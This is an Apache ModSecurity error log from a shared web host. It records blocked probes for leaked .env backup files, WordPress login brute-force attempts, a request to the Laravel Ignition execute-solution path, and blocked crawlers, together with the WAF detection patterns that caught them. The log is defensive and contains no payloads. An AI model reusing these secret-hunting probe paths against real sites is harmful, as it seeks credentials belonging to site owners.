[Tue May 26 17:55:18.548094 2026] [security2:error] [pid 946381:tid 946619] [client 208.84.100.97:7602] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/.env.local.bak"] [unique_id "ahWRLtiTu5WG4Dm5WpryUwAAAGw"]
[Tue May 26 17:55:18.548126 2026] [security2:error] [pid 946381:tid 946596] [client 208.84.100.97:7572] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/.env.production.swp"] [unique_id "ahWRLtiTu5WG4Dm5WpryWAAAAFU"]
[Tue May 26 17:55:18.547947 2026] [security2:error] [pid 946381:tid 946612] [client 208.84.100.97:7596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/.env.backup"] [unique_id "ahWRLtiTu5WG4Dm5WpryUgAAAGU"]
[Tue May 26 17:55:18.548039 2026] [security2:error] [pid 946381:tid 946625] [client 208.84.100.97:7562] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/.env.production~"] [unique_id "ahWRLtiTu5WG4Dm5WpryWQAAAHI"]
[Tue May 26 17:55:18.548220 2026] [security2:error] [pid 946381:tid 946620] [client 208.84.100.97:7586] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/.env.local.orig"] [unique_id "ahWRLtiTu5WG4Dm5WpryVgAAAG0"]
[Tue May 26 17:55:18.548276 2026] [security2:error] [pid 946381:tid 946626] [client 208.84.100.97:7522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/.env.production.old"] [unique_id "ahWRLtiTu5WG4Dm5WpryWgAAAHM"]
[Tue May 26 17:55:18.553311 2026] [security2:error] [pid 946381:tid 946628] [client 208.84.100.97:7500] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/.env.production.backup"] [unique_id "ahWRLtiTu5WG4Dm5WpryXAAAAHU"]
[Tue May 26 17:55:21.122902 2026] [security2:error] [pid 946381:tid 946590] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRMNiTu5WG4Dm5WpryjwAAAE8"]
[Tue May 26 17:55:21.788297 2026] [security2:error] [pid 946381:tid 946560] [client 80.225.239.126:33188] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "tedxnutm.org.ng"] [uri "/"] [unique_id "ahWRMdiTu5WG4Dm5WpryowAAADE"]
[Tue May 26 17:55:22.910437 2026] [security2:error] [pid 946381:tid 946405] [remote 103.95.119.103:37070] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWRMtiTu5WG4Dm5WpryygAAXRc"]
[Tue May 26 17:55:23.290781 2026] [security2:error] [pid 946381:tid 946572] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRMtiTu5WG4Dm5WpryzgAAAD0"]
[Tue May 26 17:55:24.145993 2026] [security2:error] [pid 946381:tid 946564] [client 162.243.41.33:61417] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.41.243.162.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "staging.unsobered.com"] [uri "/xmlrpc.php"] [unique_id "ahWRM9iTu5WG4Dm5Wpry5wAAADU"]
[Tue May 26 17:55:24.146231 2026] [security2:error] [pid 946381:tid 946564] [client 162.243.41.33:61417] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "staging.unsobered.com"] [uri "/xmlrpc.php"] [unique_id "ahWRM9iTu5WG4Dm5Wpry5wAAADU"]
[Tue May 26 17:55:24.488934 2026] [security2:error] [pid 946381:tid 946571] [client 162.243.41.33:64546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.41.243.162.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "staging.unsobered.com"] [uri "/xmlrpc.php"] [unique_id "ahWRNNiTu5WG4Dm5Wpry9wAAADw"]
[Tue May 26 17:55:24.489062 2026] [security2:error] [pid 946381:tid 946571] [client 162.243.41.33:64546] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "staging.unsobered.com"] [uri "/xmlrpc.php"] [unique_id "ahWRNNiTu5WG4Dm5Wpry9wAAADw"]
[Tue May 26 17:55:24.559121 2026] [security2:error] [pid 946381:tid 946410] [remote 178.104.164.71:43634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWRNNiTu5WG4Dm5Wpry9AAAfhw"]
[Tue May 26 17:55:24.932823 2026] [security2:error] [pid 946381:tid 946522] [client 167.160.64.254:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWRNNiTu5WG4Dm5Wpry_gAAAAs"], referer: https://app.simplificaci.com.br/
[Tue May 26 17:55:26.060348 2026] [security2:error] [pid 946381:tid 946608] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRNdiTu5WG4Dm5WprzEwAAAGE"]
[Tue May 26 17:55:28.647055 2026] [security2:error] [pid 946381:tid 946585] [client 109.165.195.144:56764] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "freshmindsolutions.com"] [uri "/wp-comments-post.php"] [unique_id "ahWRONiTu5WG4Dm5WprzUQAAAEo"]
[Tue May 26 17:55:28.686009 2026] [security2:error] [pid 946381:tid 946521] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRONiTu5WG4Dm5WprzUAAAAAo"]
[Tue May 26 17:55:28.968432 2026] [security2:error] [pid 946381:tid 946585] [client 109.165.195.144:56764] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "freshmindsolutions.com"] [uri "/wp-comments-post.php"] [unique_id "ahWRONiTu5WG4Dm5WprzUQAAAEo"]
[Tue May 26 17:55:28.968506 2026] [security2:error] [pid 946381:tid 946585] [client 109.165.195.144:56764] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "freshmindsolutions.com"] [uri "/wp-comments-post.php"] [unique_id "ahWRONiTu5WG4Dm5WprzUQAAAEo"]
[Tue May 26 17:55:29.677663 2026] [security2:error] [pid 946381:tid 946522] [client 109.165.195.144:56825] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "freshmindsolutions.com"] [uri "/wp-comments-post.php"] [unique_id "ahWROdiTu5WG4Dm5WprzggAAAAs"]
[Tue May 26 17:55:29.922112 2026] [security2:error] [pid 946381:tid 946522] [client 109.165.195.144:56825] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "freshmindsolutions.com"] [uri "/wp-comments-post.php"] [unique_id "ahWROdiTu5WG4Dm5WprzggAAAAs"]
[Tue May 26 17:55:31.470379 2026] [security2:error] [pid 946381:tid 946624] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRO9iTu5WG4Dm5WprzogAAAHE"]
[Tue May 26 17:55:33.184067 2026] [security2:error] [pid 946381:tid 946520] [client 113.176.17.89:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRPNiTu5WG4Dm5WprzzwAAAAk"]
[Tue May 26 17:55:33.999550 2026] [security2:error] [pid 946381:tid 946585] [client 162.243.41.33:64694] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.41.243.162.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "staging.unsobered.com"] [uri "/xmlrpc.php"] [unique_id "ahWRPdiTu5WG4Dm5Wprz9gAAAEo"]
[Tue May 26 17:55:33.999674 2026] [security2:error] [pid 946381:tid 946585] [client 162.243.41.33:64694] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "staging.unsobered.com"] [uri "/xmlrpc.php"] [unique_id "ahWRPdiTu5WG4Dm5Wprz9gAAAEo"]
[Tue May 26 17:55:34.426272 2026] [security2:error] [pid 946381:tid 946603] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRPdiTu5WG4Dm5Wprz9QAAAFw"]
[Tue May 26 17:55:36.898176 2026] [security2:error] [pid 946381:tid 946524] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRQNiTu5WG4Dm5Wpr0KQAAAA0"]
[Tue May 26 17:55:37.480585 2026] [security2:error] [pid 946381:tid 946549] [client 162.243.41.33:53831] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.41.243.162.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "staging.unsobered.com"] [uri "/xmlrpc.php"] [unique_id "ahWRQdiTu5WG4Dm5Wpr0NgAAACY"]
[Tue May 26 17:55:37.480763 2026] [security2:error] [pid 946381:tid 946549] [client 162.243.41.33:53831] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "staging.unsobered.com"] [uri "/xmlrpc.php"] [unique_id "ahWRQdiTu5WG4Dm5Wpr0NgAAACY"]
[Tue May 26 17:55:38.578877 2026] [security2:error] [pid 946381:tid 946567] [client 185.213.83.50:31518] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "www.billing.mosykay.com"] [uri "/_ignition/execute-solution"] [unique_id "ahWRQtiTu5WG4Dm5Wpr0SgAAADg"]
[Tue May 26 17:55:38.849258 2026] [security2:error] [pid 946381:tid 946528] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRQtiTu5WG4Dm5Wpr0SQAAABE"]
[Tue May 26 17:55:41.147709 2026] [security2:error] [pid 946381:tid 946512] [client 85.208.96.202:62720] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/11/"] [unique_id "ahWRRdiTu5WG4Dm5Wpr0fQAAAAE"]
[Tue May 26 17:55:41.147852 2026] [security2:error] [pid 946381:tid 946512] [client 85.208.96.202:62720] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/11/"] [unique_id "ahWRRdiTu5WG4Dm5Wpr0fQAAAAE"]
[Tue May 26 17:55:42.169934 2026] [security2:error] [pid 946381:tid 946517] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRRdiTu5WG4Dm5Wpr0jgAAAAY"]
[Tue May 26 17:55:43.944727 2026] [security2:error] [pid 946381:tid 946566] [client 62.60.130.228:51173] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahWRR9iTu5WG4Dm5Wpr0vgAAADc"], referer: https://duckduckgo.com/
[Tue May 26 17:55:44.220116 2026] [security2:error] [pid 946381:tid 946538] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRR9iTu5WG4Dm5Wpr0vQAAABs"]
[Tue May 26 17:55:44.273421 2026] [security2:error] [pid 946381:tid 946586] [client 62.60.130.228:49524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahWRSNiTu5WG4Dm5Wpr0yAAAAEs"]
[Tue May 26 17:55:45.111617 2026] [security2:error] [pid 946381:tid 946488] [remote 47.128.127.96:55368] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "staging.unsobered.com"] [uri "/feature-post/new-technology-detects-whiskys-age/"] [unique_id "ahWRSdiTu5WG4Dm5Wpr01gAAeWo"]
[Tue May 26 17:55:46.941424 2026] [security2:error] [pid 946381:tid 946544] [client 62.60.130.228:56600] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahWRStiTu5WG4Dm5Wpr1BwAAACE"]
[Tue May 26 17:55:47.333752 2026] [security2:error] [pid 946381:tid 946482] [remote 209.42.18.223:38114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWRS9iTu5WG4Dm5Wpr1CgAAFmQ"]
[Tue May 26 17:55:47.365922 2026] [security2:error] [pid 946381:tid 946557] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRStiTu5WG4Dm5Wpr1AwAAAC4"]
[Tue May 26 17:55:48.317244 2026] [security2:error] [pid 946381:tid 946588] [client 114.119.141.51:20047] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "pestcontroldelhi.co.in"] [uri "/"] [unique_id "ahWRTNiTu5WG4Dm5Wpr1IAAAAE0"], referer: https://intently.co/providers/India/Delhi/Pest%2BControl
[Tue May 26 17:55:48.505036 2026] [autoindex:error] [pid 946381:tid 946610] [client 103.108.58.177:56273] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:55:48.813883 2026] [security2:error] [pid 946381:tid 946575] [client 74.7.175.178:41452] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.swamijifoundation.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWRTNiTu5WG4Dm5Wpr1LAAAQGw"]
[Tue May 26 17:55:48.824921 2026] [security2:error] [pid 946381:tid 946597] [client 184.154.76.35:41554] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "freshmindsolutions.com"] [uri "/wp-content/themes/anomica/assets/flexslider/jquery.flexslider-min.js"] [unique_id "ahWRTNiTu5WG4Dm5Wpr1LwAAAFY"]
[Tue May 26 17:55:49.986565 2026] [security2:error] [pid 946381:tid 946542] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRTdiTu5WG4Dm5Wpr1RwAAAB8"]
[Tue May 26 17:55:51.007519 2026] [security2:error] [pid 946381:tid 946386] [remote 216.73.216.30:36874] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWRT9iTu5WG4Dm5Wpr1awAAPAQ"]
[Tue May 26 17:55:51.088461 2026] [security2:error] [pid 946381:tid 946545] [client 184.154.76.35:41566] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "freshmindsolutions.com"] [uri "/wp-content/themes/anomica/css/anomica-last-checkpoint.min.css"] [unique_id "ahWRT9iTu5WG4Dm5Wpr1bQAAACI"]
[Tue May 26 17:55:51.661919 2026] [security2:error] [pid 946381:tid 946568] [client 185.247.137.113:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.kingsclub.in"] [uri "/index.php"] [unique_id "ahWRT9iTu5WG4Dm5Wpr1eAAAOQc"]
[Tue May 26 17:55:51.700224 2026] [security2:error] [pid 946381:tid 946624] [client 195.96.139.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWRT9iTu5WG4Dm5Wpr1dgAAcXM"]
[Tue May 26 17:55:52.222719 2026] [security2:error] [pid 946381:tid 946586] [client 184.154.76.35:41590] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "freshmindsolutions.com"] [uri "/wp-content/themes/anomica/css/bootstrap-theme.min.css"] [unique_id "ahWRUNiTu5WG4Dm5Wpr1jwAAAEs"]
[Tue May 26 17:55:52.554175 2026] [security2:error] [pid 946381:tid 946393] [remote 51.195.215.203:41260] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "triviewsolutions.com"] [uri "/robots.txt"] [unique_id "ahWRUNiTu5WG4Dm5Wpr1lgAAdws"]
[Tue May 26 17:55:52.554348 2026] [security2:error] [pid 946381:tid 946630] [client 51.195.215.203:41260] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "triviewsolutions.com"] [uri "/robots.txt"] [unique_id "ahWRUNiTu5WG4Dm5Wpr1lgAAdws"]
[Tue May 26 17:55:52.614598 2026] [security2:error] [pid 946381:tid 946552] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRUNiTu5WG4Dm5Wpr1jgAAACk"]
[Tue May 26 17:55:54.409297 2026] [security2:error] [pid 946381:tid 946403] [remote 167.114.139.120:19182] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "triviewsolutions.com"] [uri "/"] [unique_id "ahWRUtiTu5WG4Dm5Wpr10QAALRU"]
[Tue May 26 17:55:54.409485 2026] [security2:error] [pid 946381:tid 946556] [client 167.114.139.120:19182] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "triviewsolutions.com"] [uri "/"] [unique_id "ahWRUtiTu5WG4Dm5Wpr10QAALRU"]
